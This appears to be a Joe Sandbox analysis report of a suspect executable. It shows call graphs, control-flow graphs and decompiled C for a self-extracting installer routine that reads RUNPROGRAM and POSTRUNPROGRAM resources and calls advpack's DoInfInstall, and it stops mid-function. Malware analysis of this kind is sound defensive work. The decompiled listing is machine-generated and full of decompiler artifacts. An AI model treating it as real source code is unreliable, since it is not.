Function_00F8490C 70->114 71->19 71->35 71->61 71->69 72->91 73 Function_00F87270 75->19 75->60 75->63 75->67 76 Function_00F84169 76->35 76->62 77->20 78->42 78->112 79 Function_00F87060 100 Function_00F87120 79->100 109 Function_00F87010 79->109 81 Function_00F86760 82 Function_00F86A60 82->1 82->79 90 Function_00F87155 82->90 82->92 95 Function_00F86C3F 82->95 113 Function_00F87208 82->113 83 Function_00F85164 83->35 83->52 83->62 84->19 84->27 84->45 84->60 84->63 84->67 84->69 84->71 85->19 85->60 85->107 86 Function_00F84A50 87 Function_00F83450 87->24 89->92 89->113 93 Function_00F86F40 94 Function_00F83A3F 94->35 94->62 94->69 94->112 96->19 96->35 98->19 98->35 98->60 98->107 99->6 101 Function_00F86A20 102 Function_00F84224 102->35 102->63 103 Function_00F83B26 103->16 103->52 103->112 104->51 105->19 105->23 105->35 105->43 105->47 105->60 105->69 105->76 105->77 105->83 105->94 105->103 106 Function_00F8621E 105->106 106->19 106->35 106->69 106->71 108->0 108->19 110 Function_00F83210 110->24 110->27 110->35 110->60 110->71 110->102 112->35 115 Function_00F83100 115->24 116 Function_00F84200 118->38 118->63 119 Function_00F86C03 119->92

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 36 f83ba2-f83bd9 37 f83bdb-f83bee call f8468f 36->37 38 f83bfd-f83bff 36->38 44 f83d13-f83d30 call f844b9 37->44 45 f83bf4-f83bf7 37->45 40 f83c03-f83c28 memset 38->40 42 f83c2e-f83c40 call f8468f 40->42 43 f83d35-f83d48 call f81781 40->43 42->44 51 f83c46-f83c49 42->51 49 f83d4d-f83d52 43->49 57 f83f4d 44->57 45->38 45->44 53 f83d9e-f83db6 call f81ae8 49->53 54 f83d54-f83d6c call f8468f 49->54 51->44 55 f83c4f-f83c56 51->55 53->57 68 f83dbc-f83dc2 53->68 54->44 64 f83d6e-f83d75 54->64 59 f83c58-f83c5e 55->59 60 f83c60-f83c65 55->60 62 f83f4f-f83f63 call f86ce0 57->62 65 f83c6e-f83c73 59->65 66 f83c75-f83c7c 60->66 67 f83c67-f83c6d 60->67 70 f83fda-f83fe1 64->70 71 f83d7b-f83d98 CompareStringA 64->71 72 f83c87-f83c89 65->72 66->72 75 f83c7e-f83c82 66->75 67->65 73 f83dc4-f83dce 68->73 74 f83de6-f83de8 68->74 81 f83fe8-f83fea 70->81 82 f83fe3 call f82267 70->82 71->53 71->70 72->49 78 f83c8f-f83c98 72->78 73->74 77 f83dd0-f83dd7 73->77 79 f83f0b-f83f15 call f83fef 74->79 80 f83dee-f83df5 74->80 75->72 77->74 84 f83dd9-f83ddb 77->84 85 f83c9a-f83c9c 78->85 86 f83cf1-f83cf3 78->86 91 f83f1a-f83f1c 79->91 87 f83fab-f83fd2 call f844b9 LocalFree 80->87 88 f83dfb-f83dfd 80->88 81->62 82->81 84->80 92 f83ddd-f83de1 call f8202a 84->92 94 f83c9e-f83ca3 85->94 95 f83ca5-f83ca7 85->95 86->53 90 f83cf9-f83d11 call f8468f 86->90 87->57 88->79 96 f83e03-f83e0a 88->96 90->44 90->49 98 f83f1e-f83f2d LocalFree 91->98 99 f83f46-f83f47 LocalFree 91->99 92->74 102 f83cb2-f83cc5 call f8468f 94->102 95->57 103 f83cad 95->103 96->79 104 f83e10-f83e19 call f86495 96->104 107 f83f33-f83f3b 98->107 108 f83fd7-f83fd9 98->108 99->57 102->44 112 f83cc7-f83ce8 CompareStringA 102->112 103->102 113 f83e1f-f83e36 GetProcAddress 104->113 114 f83f92-f83fa9 call f844b9 104->114 107->40 108->70 112->86 115 f83cea-f83ced 112->115 116 f83e3c-f83e80 113->116 117 f83f64-f83f76 call f844b9 FreeLibrary 113->117 126 f83f7c-f83f90 LocalFree call f86285 114->126 115->86 120 f83e8b-f83e94 116->120 121 f83e82-f83e87 116->121 117->126 124 f83e9f-f83ea2 120->124 125 f83e96-f83e9b 120->125 121->120 128 f83ead-f83eb6 124->128 129 f83ea4-f83ea9 124->129 125->124 126->57 131 f83eb8-f83ebd 128->131 132 f83ec1-f83ec3 128->132 129->128 131->132 133 f83ece-f83eec 132->133 134 f83ec5-f83eca 132->134 137 f83eee-f83ef3 133->137 138 f83ef5-f83efd 133->138 134->133 137->138 139 f83eff-f83f09 FreeLibrary 138->139 140 f83f40 FreeLibrary 138->140 139->98 140->99
                                                                      C-Code - Quality: 82%
                                                                      			E00F83BA2() {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				char _v276;
                                                                      				char _v280;
                                                                      				short _v300;
                                                                      				intOrPtr _v304;
                                                                      				void _v348;
                                                                      				char _v352;
                                                                      				intOrPtr _v356;
                                                                      				signed int _v360;
                                                                      				short _v364;
                                                                      				char* _v368;
                                                                      				intOrPtr _v372;
                                                                      				void* _v376;
                                                                      				intOrPtr _v380;
                                                                      				char _v384;
                                                                      				signed int _v388;
                                                                      				intOrPtr _v392;
                                                                      				signed int _v396;
                                                                      				signed int _v400;
                                                                      				signed int _v404;
                                                                      				void* _v408;
                                                                      				void* _v424;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t69;
                                                                      				signed int _t76;
                                                                      				void* _t77;
                                                                      				signed int _t79;
                                                                      				short _t96;
                                                                      				signed int _t97;
                                                                      				intOrPtr _t98;
                                                                      				signed int _t101;
                                                                      				signed int _t104;
                                                                      				signed int _t108;
                                                                      				int _t112;
                                                                      				void* _t115;
                                                                      				signed char _t118;
                                                                      				void* _t125;
                                                                      				signed int _t127;
                                                                      				void* _t128;
                                                                      				struct HINSTANCE__* _t129;
                                                                      				void* _t130;
                                                                      				short _t137;
                                                                      				char* _t140;
                                                                      				signed char _t144;
                                                                      				signed char _t145;
                                                                      				signed int _t149;
                                                                      				void* _t150;
                                                                      				void* _t151;
                                                                      				signed int _t153;
                                                                      				void* _t155;
                                                                      				void* _t156;
                                                                      				signed int _t157;
                                                                      				signed int _t162;
                                                                      				signed int _t164;
                                                                      				void* _t165;
                                                                      
                                                                      				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                      				_t69 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t69 ^ _t164;
                                                                      				_t153 = 0;
                                                                      				 *0xf89124 =  *0xf89124 & 0;
                                                                      				_t149 = 0;
                                                                      				_v388 = 0;
                                                                      				_v384 = 0;
                                                                      				_t165 =  *0xf88a28 - _t153; // 0x0
                                                                      				if(_t165 != 0) {
                                                                      					L3:
                                                                      					_t127 = 0;
                                                                      					_v392 = 0;
                                                                      					while(1) {
                                                                      						_v400 = _v400 & 0x00000000;
                                                                      						memset( &_v348, 0, 0x44);
                                                                      						_t164 = _t164 + 0xc;
                                                                      						_v348 = 0x44;
                                                                      						if( *0xf88c42 != 0) {
                                                                      							goto L26;
                                                                      						}
                                                                      						_t146 =  &_v396;
                                                                      						_t115 = E00F8468F("SHOWWINDOW",  &_v396, 4);
                                                                      						if(_t115 == 0 || _t115 > 4) {
                                                                      							L25:
                                                                      							_t146 = 0x4b1;
                                                                      							E00F844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                      							 *0xf89124 = 0x80070714;
                                                                      							goto L62;
                                                                      						} else {
                                                                      							if(_v396 != 1) {
                                                                      								__eflags = _v396 - 2;
                                                                      								if(_v396 != 2) {
                                                                      									_t137 = 3;
                                                                      									__eflags = _v396 - _t137;
                                                                      									if(_v396 == _t137) {
                                                                      										_v304 = 1;
                                                                      										_v300 = _t137;
                                                                      									}
                                                                      									goto L14;
                                                                      								}
                                                                      								_push(6);
                                                                      								_v304 = 1;
                                                                      								_pop(0);
                                                                      								goto L11;
                                                                      							} else {
                                                                      								_v304 = 1;
                                                                      								L11:
                                                                      								_v300 = 0;
                                                                      								L14:
                                                                      								if(_t127 != 0) {
                                                                      									L27:
                                                                      									_t155 = 1;
                                                                      									__eflags = _t127 - 1;
                                                                      									if(_t127 != 1) {
                                                                      										L31:
                                                                      										_t132 =  &_v280;
                                                                      										_t76 = E00F81AE8( &_v280,  &_v408,  &_v404); // executed
                                                                      										__eflags = _t76;
                                                                      										if(_t76 == 0) {
                                                                      											L62:
                                                                      											_t77 = 0;
                                                                      											L63:
                                                                      											_pop(_t150);
                                                                      											_pop(_t156);
                                                                      											_pop(_t128);
                                                                      											return E00F86CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                      										}
                                                                      										_t157 = _v404;
                                                                      										__eflags = _t149;
                                                                      										if(_t149 != 0) {
                                                                      											L37:
                                                                      											__eflags = _t157;
                                                                      											if(_t157 == 0) {
                                                                      												L57:
                                                                      												_t151 = _v408;
                                                                      												_t146 =  &_v352;
                                                                      												_t130 = _t151; // executed
                                                                      												_t79 = E00F83FEF(_t130,  &_v352); // executed
                                                                      												__eflags = _t79;
                                                                      												if(_t79 == 0) {
                                                                      													L61:
                                                                      													LocalFree(_t151);
                                                                      													goto L62;
                                                                      												}
                                                                      												L58:
                                                                      												LocalFree(_t151);
                                                                      												_t127 = _t127 + 1;
                                                                      												_v396 = _t127;
                                                                      												__eflags = _t127 - 2;
                                                                      												if(_t127 >= 2) {
                                                                      													_t155 = 1;
                                                                      													__eflags = 1;
                                                                      													L69:
                                                                      													__eflags =  *0xf88580;
                                                                      													if( *0xf88580 != 0) {
                                                                      														E00F82267();
                                                                      													}
                                                                      													_t77 = _t155;
                                                                      													goto L63;
                                                                      												}
                                                                      												_t153 = _v392;
                                                                      												_t149 = _v388;
                                                                      												continue;
                                                                      											}
                                                                      											L38:
                                                                      											__eflags =  *0xf88180;
                                                                      											if( *0xf88180 == 0) {
                                                                      												_t146 = 0x4c7;
                                                                      												E00F844B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                      												LocalFree(_v424);
                                                                      												 *0xf89124 = 0x8007042b;
                                                                      												goto L62;
                                                                      											}
                                                                      											__eflags = _t157;
                                                                      											if(_t157 == 0) {
                                                                      												goto L57;
                                                                      											}
                                                                      											__eflags =  *0xf89a34 & 0x00000004;
                                                                      											if(__eflags == 0) {
                                                                      												goto L57;
                                                                      											}
                                                                      											_t129 = E00F86495(_t127, _t132, _t157, __eflags);
                                                                      											__eflags = _t129;
                                                                      											if(_t129 == 0) {
                                                                      												_t146 = 0x4c8;
                                                                      												E00F844B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                      												L65:
                                                                      												LocalFree(_v408);
                                                                      												 *0xf89124 = E00F86285();
                                                                      												goto L62;
                                                                      											}
                                                                      											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                      											_v404 = _t146;
                                                                      											__eflags = _t146;
                                                                      											if(_t146 == 0) {
                                                                      												_t146 = 0x4c9;
                                                                      												__eflags = 0;
                                                                      												E00F844B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                      												FreeLibrary(_t129);
                                                                      												goto L65;
                                                                      											}
                                                                      											__eflags =  *0xf88a30;
                                                                      											_t151 = _v408;
                                                                      											_v384 = 0;
                                                                      											_v368 =  &_v280;
                                                                      											_t96 =  *0xf89a40; // 0x3
                                                                      											_v364 = _t96;
                                                                      											_t97 =  *0xf88a38 & 0x0000ffff;
                                                                      											_v380 = 0xf89154;
                                                                      											_v376 = _t151;
                                                                      											_v372 = 0xf891e4;
                                                                      											_v360 = _t97;
                                                                      											if( *0xf88a30 != 0) {
                                                                      												_t97 = _t97 | 0x00010000;
                                                                      												__eflags = _t97;
                                                                      												_v360 = _t97;
                                                                      											}
                                                                      											_t144 =  *0xf89a34; // 0x1
                                                                      											__eflags = _t144 & 0x00000008;
                                                                      											if((_t144 & 0x00000008) != 0) {
                                                                      												_t97 = _t97 | 0x00020000;
                                                                      												__eflags = _t97;
                                                                      												_v360 = _t97;
                                                                      											}
                                                                      											__eflags = _t144 & 0x00000010;
                                                                      											if((_t144 & 0x00000010) != 0) {
                                                                      												_t97 = _t97 | 0x00040000;
                                                                      												__eflags = _t97;
                                                                      												_v360 = _t97;
                                                                      											}
                                                                      											_t145 =  *0xf88d48; // 0x0
                                                                      											__eflags = _t145 & 0x00000040;
                                                                      											if((_t145 & 0x00000040) != 0) {
                                                                      												_t97 = _t97 | 0x00080000;
                                                                      												__eflags = _t97;
                                                                      												_v360 = _t97;
                                                                      											}
                                                                      											__eflags = _t145;
                                                                      											if(_t145 < 0) {
                                                                      												_t104 = _t97 | 0x00100000;
                                                                      												__eflags = _t104;
                                                                      												_v360 = _t104;
                                                                      											}
                                                                      											_t98 =  *0xf89a38; // 0x0
                                                                      											_v356 = _t98;
                                                                      											_t130 = _t146;
                                                                      											 *0xf8a288( &_v384);
                                                                      											_t101 = _v404();
                                                                      											__eflags = _t164 - _t164;
                                                                      											if(_t164 != _t164) {
                                                                      												_t130 = 4;
                                                                      												asm("int 0x29");
                                                                      											}
                                                                      											 *0xf89124 = _t101;
                                                                      											_push(_t129);
                                                                      											__eflags = _t101;
                                                                      											if(_t101 < 0) {
                                                                      												FreeLibrary();
                                                                      												goto L61;
                                                                      											} else {
                                                                      												FreeLibrary();
                                                                      												_t127 = _v400;
                                                                      												goto L58;
                                                                      											}
                                                                      										}
                                                                      										__eflags =  *0xf89a40 - 1; // 0x3
                                                                      										if(__eflags == 0) {
                                                                      											goto L37;
                                                                      										}
                                                                      										__eflags =  *0xf88a20;
                                                                      										if( *0xf88a20 == 0) {
                                                                      											goto L37;
                                                                      										}
                                                                      										__eflags = _t157;
                                                                      										if(_t157 != 0) {
                                                                      											goto L38;
                                                                      										}
                                                                      										_v388 = 1;
                                                                      										E00F8202A(_t146); // executed
                                                                      										goto L37;
                                                                      									}
                                                                      									_t146 =  &_v280;
                                                                      									_t108 = E00F8468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                      									__eflags = _t108;
                                                                      									if(_t108 == 0) {
                                                                      										goto L25;
                                                                      									}
                                                                      									__eflags =  *0xf88c42;
                                                                      									if( *0xf88c42 != 0) {
                                                                      										goto L69;
                                                                      									}
                                                                      									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                      									__eflags = _t112 == 0;
                                                                      									if(_t112 == 0) {
                                                                      										goto L69;
                                                                      									}
                                                                      									goto L31;
                                                                      								}
                                                                      								_t118 =  *0xf88a38; // 0x0
                                                                      								if(_t118 == 0) {
                                                                      									L23:
                                                                      									if(_t153 != 0) {
                                                                      										goto L31;
                                                                      									}
                                                                      									_t146 =  &_v276;
                                                                      									if(E00F8468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                      										goto L27;
                                                                      									}
                                                                      									goto L25;
                                                                      								}
                                                                      								if((_t118 & 0x00000001) == 0) {
                                                                      									__eflags = _t118 & 0x00000002;
                                                                      									if((_t118 & 0x00000002) == 0) {
                                                                      										goto L62;
                                                                      									}
                                                                      									_t140 = "USRQCMD";
                                                                      									L20:
                                                                      									_t146 =  &_v276;
                                                                      									if(E00F8468F(_t140,  &_v276, 0x104) == 0) {
                                                                      										goto L25;
                                                                      									}
                                                                      									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                      										_t153 = 1;
                                                                      										_v388 = 1;
                                                                      									}
                                                                      									goto L23;
                                                                      								}
                                                                      								_t140 = "ADMQCMD";
                                                                      								goto L20;
                                                                      							}
                                                                      						}
                                                                      						L26:
                                                                      						_push(_t130);
                                                                      						_t146 = 0x104;
                                                                      						E00F81781( &_v276, 0x104, _t130, 0xf88c42);
                                                                      						goto L27;
                                                                      					}
                                                                      				}
                                                                      				_t130 = "REBOOT";
                                                                      				_t125 = E00F8468F(_t130, 0xf89a2c, 4);
                                                                      				if(_t125 == 0 || _t125 > 4) {
                                                                      					goto L25;
                                                                      				} else {
                                                                      					goto L3;
                                                                      				}
                                                                      			}





























































                                                                      0x00f83baa
                                                                      0x00f83bb0
                                                                      0x00f83bb7
                                                                      0x00f83bc0
                                                                      0x00f83bc2
                                                                      0x00f83bc9
                                                                      0x00f83bcb
                                                                      0x00f83bcf
                                                                      0x00f83bd3
                                                                      0x00f83bd9
                                                                      0x00f83bfd
                                                                      0x00f83bfd
                                                                      0x00f83bff
                                                                      0x00f83c03
                                                                      0x00f83c03
                                                                      0x00f83c11
                                                                      0x00f83c16
                                                                      0x00f83c19
                                                                      0x00f83c28
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83c30
                                                                      0x00f83c39
                                                                      0x00f83c40
                                                                      0x00f83d13
                                                                      0x00f83d15
                                                                      0x00f83d21
                                                                      0x00f83d26
                                                                      0x00000000
                                                                      0x00f83c4f
                                                                      0x00f83c56
                                                                      0x00f83c60
                                                                      0x00f83c65
                                                                      0x00f83c77
                                                                      0x00f83c78
                                                                      0x00f83c7c
                                                                      0x00f83c7e
                                                                      0x00f83c82
                                                                      0x00f83c82
                                                                      0x00000000
                                                                      0x00f83c7c
                                                                      0x00f83c67
                                                                      0x00f83c69
                                                                      0x00f83c6d
                                                                      0x00000000
                                                                      0x00f83c58
                                                                      0x00f83c58
                                                                      0x00f83c6e
                                                                      0x00f83c6e
                                                                      0x00f83c87
                                                                      0x00f83c89
                                                                      0x00f83d4d
                                                                      0x00f83d4f
                                                                      0x00f83d50
                                                                      0x00f83d52
                                                                      0x00f83d9e
                                                                      0x00f83da8
                                                                      0x00f83daf
                                                                      0x00f83db4
                                                                      0x00f83db6
                                                                      0x00f83f4d
                                                                      0x00f83f4d
                                                                      0x00f83f4f
                                                                      0x00f83f56
                                                                      0x00f83f57
                                                                      0x00f83f58
                                                                      0x00f83f63
                                                                      0x00f83f63
                                                                      0x00f83dbc
                                                                      0x00f83dc0
                                                                      0x00f83dc2
                                                                      0x00f83de6
                                                                      0x00f83de6
                                                                      0x00f83de8
                                                                      0x00f83f0b
                                                                      0x00f83f0b
                                                                      0x00f83f0f
                                                                      0x00f83f13
                                                                      0x00f83f15
                                                                      0x00f83f1a
                                                                      0x00f83f1c
                                                                      0x00f83f46
                                                                      0x00f83f47
                                                                      0x00000000
                                                                      0x00f83f47
                                                                      0x00f83f1e
                                                                      0x00f83f1f
                                                                      0x00f83f25
                                                                      0x00f83f26
                                                                      0x00f83f2a
                                                                      0x00f83f2d
                                                                      0x00f83fd9
                                                                      0x00f83fd9
                                                                      0x00f83fda
                                                                      0x00f83fda
                                                                      0x00f83fe1
                                                                      0x00f83fe3
                                                                      0x00f83fe3
                                                                      0x00f83fe8
                                                                      0x00000000
                                                                      0x00f83fe8
                                                                      0x00f83f33
                                                                      0x00f83f37
                                                                      0x00000000
                                                                      0x00f83f37
                                                                      0x00f83dee
                                                                      0x00f83dee
                                                                      0x00f83df5
                                                                      0x00f83fad
                                                                      0x00f83fb9
                                                                      0x00f83fc2
                                                                      0x00f83fc8
                                                                      0x00000000
                                                                      0x00f83fc8
                                                                      0x00f83dfb
                                                                      0x00f83dfd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83e03
                                                                      0x00f83e0a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83e15
                                                                      0x00f83e17
                                                                      0x00f83e19
                                                                      0x00f83f94
                                                                      0x00f83fa4
                                                                      0x00f83f7c
                                                                      0x00f83f80
                                                                      0x00f83f8b
                                                                      0x00000000
                                                                      0x00f83f8b
                                                                      0x00f83e2c
                                                                      0x00f83e30
                                                                      0x00f83e34
                                                                      0x00f83e36
                                                                      0x00f83f69
                                                                      0x00f83f6e
                                                                      0x00f83f70
                                                                      0x00f83f76
                                                                      0x00000000
                                                                      0x00f83f76
                                                                      0x00f83e3c
                                                                      0x00f83e43
                                                                      0x00f83e47
                                                                      0x00f83e52
                                                                      0x00f83e56
                                                                      0x00f83e5c
                                                                      0x00f83e61
                                                                      0x00f83e68
                                                                      0x00f83e70
                                                                      0x00f83e74
                                                                      0x00f83e7c
                                                                      0x00f83e80
                                                                      0x00f83e82
                                                                      0x00f83e82
                                                                      0x00f83e87
                                                                      0x00f83e87
                                                                      0x00f83e8b
                                                                      0x00f83e91
                                                                      0x00f83e94
                                                                      0x00f83e96
                                                                      0x00f83e96
                                                                      0x00f83e9b
                                                                      0x00f83e9b
                                                                      0x00f83e9f
                                                                      0x00f83ea2
                                                                      0x00f83ea4
                                                                      0x00f83ea4
                                                                      0x00f83ea9
                                                                      0x00f83ea9
                                                                      0x00f83ead
                                                                      0x00f83eb3
                                                                      0x00f83eb6
                                                                      0x00f83eb8
                                                                      0x00f83eb8
                                                                      0x00f83ebd
                                                                      0x00f83ebd
                                                                      0x00f83ec1
                                                                      0x00f83ec3
                                                                      0x00f83ec5
                                                                      0x00f83ec5
                                                                      0x00f83eca
                                                                      0x00f83eca
                                                                      0x00f83ece
                                                                      0x00f83ed5
                                                                      0x00f83ed9
                                                                      0x00f83ee0
                                                                      0x00f83ee6
                                                                      0x00f83eea
                                                                      0x00f83eec
                                                                      0x00f83eee
                                                                      0x00f83ef3
                                                                      0x00f83ef3
                                                                      0x00f83ef5
                                                                      0x00f83efa
                                                                      0x00f83efb
                                                                      0x00f83efd
                                                                      0x00f83f40
                                                                      0x00000000
                                                                      0x00f83eff
                                                                      0x00f83eff
                                                                      0x00f83f05
                                                                      0x00000000
                                                                      0x00f83f05
                                                                      0x00f83efd
                                                                      0x00f83dc7
                                                                      0x00f83dce
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83dd0
                                                                      0x00f83dd7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83dd9
                                                                      0x00f83ddb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83ddd
                                                                      0x00f83de1
                                                                      0x00000000
                                                                      0x00f83de1
                                                                      0x00f83d59
                                                                      0x00f83d65
                                                                      0x00f83d6a
                                                                      0x00f83d6c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83d6e
                                                                      0x00f83d75
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83d8f
                                                                      0x00f83d96
                                                                      0x00f83d98
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83d98
                                                                      0x00f83c8f
                                                                      0x00f83c98
                                                                      0x00f83cf1
                                                                      0x00f83cf3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83cfe
                                                                      0x00f83d11
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83d11
                                                                      0x00f83c9c
                                                                      0x00f83ca5
                                                                      0x00f83ca7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83cad
                                                                      0x00f83cb2
                                                                      0x00f83cb7
                                                                      0x00f83cc5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83ce8
                                                                      0x00f83cec
                                                                      0x00f83ced
                                                                      0x00f83ced
                                                                      0x00000000
                                                                      0x00f83ce8
                                                                      0x00f83c9e
                                                                      0x00000000
                                                                      0x00f83c9e
                                                                      0x00f83c56
                                                                      0x00f83d35
                                                                      0x00f83d35
                                                                      0x00f83d3c
                                                                      0x00f83d48
                                                                      0x00000000
                                                                      0x00f83d48
                                                                      0x00f83c03
                                                                      0x00f83be2
                                                                      0x00f83be7
                                                                      0x00f83bee
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000

                                                                      APIs
                                                                      • memset.MSVCRT ref: 00F83C11
                                                                      • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00F83CDC
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                        • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                        • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                        • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                        • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                        • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                      • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00F88C42), ref: 00F83D8F
                                                                      • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00F83E26
                                                                      • FreeLibrary.KERNEL32(00000000,?,00F88C42), ref: 00F83EFF
                                                                      • LocalFree.KERNEL32(?,?,?,?,00F88C42), ref: 00F83F1F
                                                                      • FreeLibrary.KERNEL32(00000000,?,00F88C42), ref: 00F83F40
                                                                      • LocalFree.KERNEL32(?,?,?,?,00F88C42), ref: 00F83F47
                                                                      • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00F88C42), ref: 00F83F76
                                                                      • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00F88C42), ref: 00F83F80
                                                                      • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00F88C42), ref: 00F83FC2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                      • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                      • API String ID: 1032054927-3996648855
                                                                      • Opcode ID: 0e18e8aaf6d7a4457ebeafd849d3a92c9d78a6be1d10c5da1dc0899021cb63e3
                                                                      • Instruction ID: a568d07caecc8feb6d8a913719d33642b45830e34247fb3029338a0eecd9d0eb
                                                                      • Opcode Fuzzy Hash: 0e18e8aaf6d7a4457ebeafd849d3a92c9d78a6be1d10c5da1dc0899021cb63e3
                                                                      • Instruction Fuzzy Hash: 30B11371A083059BD724FF248C45BFB76E4EB85B60F00092EFA85D61A1EB74D905FB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 141 f81ae8-f81b2c call f81680 144 f81b3b-f81b40 141->144 145 f81b2e-f81b39 141->145 146 f81b46-f81b61 call f81a84 144->146 145->146 149 f81b9f-f81bc2 call f81781 call f8658a 146->149 150 f81b63-f81b65 146->150 157 f81bc7-f81bd3 call f866c8 149->157 152 f81b68-f81b6d 150->152 152->152 154 f81b6f-f81b74 152->154 154->149 156 f81b76-f81b7b 154->156 158 f81b7d-f81b81 156->158 159 f81b83-f81b86 156->159 166 f81bd9-f81bf1 CompareStringA 157->166 167 f81d73-f81d7f call f866c8 157->167 158->159 160 f81b8c-f81b9d call f81680 158->160 159->149 161 f81b88-f81b8a 159->161 160->157 161->149 161->160 166->167 168 f81bf7-f81c07 GetFileAttributesA 166->168 173 f81df8-f81e09 LocalAlloc 167->173 174 f81d81-f81d99 CompareStringA 167->174 170 f81c0d-f81c15 168->170 171 f81d53-f81d5e 168->171 170->171 176 f81c1b-f81c33 call f81a84 170->176 175 f81d64-f81d6e call f844b9 171->175 179 f81e0b-f81e1b GetFileAttributesA 173->179 180 f81dd4-f81ddf 173->180 174->173 178 f81d9b-f81da2 174->178 192 f81e94-f81ea4 call f86ce0 175->192 187 f81c50-f81c61 LocalAlloc 176->187 188 f81c35-f81c38 176->188 183 f81da5-f81daa 178->183 184 f81e1d-f81e1f 179->184 185 f81e67-f81e73 call f81680 179->185 180->175 183->183 189 f81dac-f81db4 183->189 184->185 191 f81e21-f81e3e call f81781 184->191 197 f81e78-f81e84 call f82aac 185->197 187->180 196 f81c67-f81c72 187->196 193 f81c3a 188->193 194 f81c40-f81c4b call f81a84 188->194 195 f81db7-f81dbc 189->195 191->197 207 f81e40-f81e43 191->207 193->194 194->187 195->195 201 f81dbe-f81dd2 LocalAlloc 195->201 202 f81c79-f81cc0 GetPrivateProfileIntA GetPrivateProfileStringA 196->202 203 f81c74 196->203 211 f81e89-f81e92 197->211 201->180 208 f81de1-f81df3 call f8171e 201->208 209 f81cf8-f81d07 202->209 210 f81cc2-f81ccc 202->210 203->202 207->197 212 f81e45-f81e65 call f816b3 * 2 207->212 208->211 213 f81d09-f81d21 GetShortPathNameA 209->213 214 f81d23 209->214 216 f81cce 210->216 217 f81cd3-f81cf3 call f81680 * 2 210->217 211->192 212->197 219 f81d28-f81d2b 213->219 214->219 216->217 217->211 223 f81d2d 219->223 224 f81d32-f81d4e call f8171e 219->224 223->224 224->211
                                                                      C-Code - Quality: 82%
                                                                      			E00F81AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				char _v527;
                                                                      				char _v528;
